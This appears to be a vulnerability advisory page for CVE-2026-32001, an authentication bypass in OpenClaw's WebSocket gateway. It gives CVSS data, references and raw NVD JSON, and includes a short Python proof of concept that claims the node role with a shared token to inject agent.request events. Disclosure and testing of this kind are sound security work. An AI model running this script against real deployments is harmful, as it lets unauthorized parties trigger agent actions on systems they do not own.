Security Vulnerability Report
CVE-2026-32001 CVSS 5.4 MEDIUM

Published: 2026-03-19 22:16:32
Last Modified: 2026-03-23 18:51:27

Description

OpenClaw versions prior to 2026.2.22 contain an authentication bypass vulnerability that allows clients authenticated with a shared gateway token to connect as role=node without device identity verification. Attackers can exploit this by claiming the node role during WebSocket handshake to inject unauthorized node.event calls, triggering agent.request and voice.transcript flows without proper device pairing.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CVSS 4.0 (secondary): 5.3 MEDIUM (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)
Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio
import json

import websockets

# Conceptual PoC for CVE-2026-32001
# This script demonstrates how an attacker might claim the 'node' role
# using a shared gateway token to inject unauthorized calls.


async def exploit_vulnerability(uri, token):
    # Construct headers with the shared gateway token
    # Note: The vulnerability bypasses device identity verification
    extra_headers = {"Authorization": f"Bearer {token}"}
    try:
        # 'extra_headers' is the legacy websockets keyword; newer releases of the
        # library (new asyncio implementation) call it 'additional_headers'.
        async with websockets.connect(uri, extra_headers=extra_headers) as websocket:
            print("[+] Connected to OpenClaw WebSocket")
            # Attack Vector: Claim role=node during handshake/initial message
            # In a vulnerable implementation, the server accepts this without
            # verifying the device identity associated with the token.
            payload = {
                "role": "node",
                "action": "node.event",
                "params": {
                    "type": "agent.request",  # Triggering unauthorized agent request
                    "data": "malicious_payload",
                },
            }
            # Send the message as JSON text (str(payload) would send a Python dict repr)
            await websocket.send(json.dumps(payload))
            print("[+] Payload sent: role=node, node.event injected")
            response = await websocket.recv()
            print(f"[+] Server response: {response}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Replace with target URI and a valid shared gateway token
    target_uri = "ws://target-openclaw-instance:8080/ws"
    shared_token = "YOUR_SHARED_GATEWAY_TOKEN_HERE"
    asyncio.run(exploit_vulnerability(target_uri, shared_token))
```

References

https://github.com/openclaw/openclaw/commit/ddcb2d79b17bf2a42c5037d8aeff1537a12b931e (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-rv2q-f2h5-6xmg (Patch, Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-node-role-device-identity-bypass-via-websocket-authentication (Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-32001", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:32.113", "lastModified": "2026-03-23T18:51:27.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an authentication bypass vulnerability that allows clients authenticated with a shared gateway token to connect as role=node without device identity verification. Attackers can exploit this by claiming the node role during WebSocket handshake to inject unauthorized node.event calls, triggering agent.request and voice.transcript flows without proper device pairing."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.22 contienen una vulnerabilidad de omisión de autenticación que permite a los clientes autenticados con un token de pasarela compartido conectarse como role=node sin verificación de identidad del dispositivo. Los atacantes pueden explotar esto al reclamar el rol de nodo durante el handshake de WebSocket para inyectar llamadas no autorizadas a node.event, desencadenando flujos de agent.request y voice.transcript sin el emparejamiento adecuado del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", 
"availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/ddcb2d79b17bf2a42c5037d8aeff1537a12b931e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rv2q-f2h5-6xmg", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": 
"https://www.vulncheck.com/advisories/openclaw-node-role-device-identity-bypass-via-websocket-authentication", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```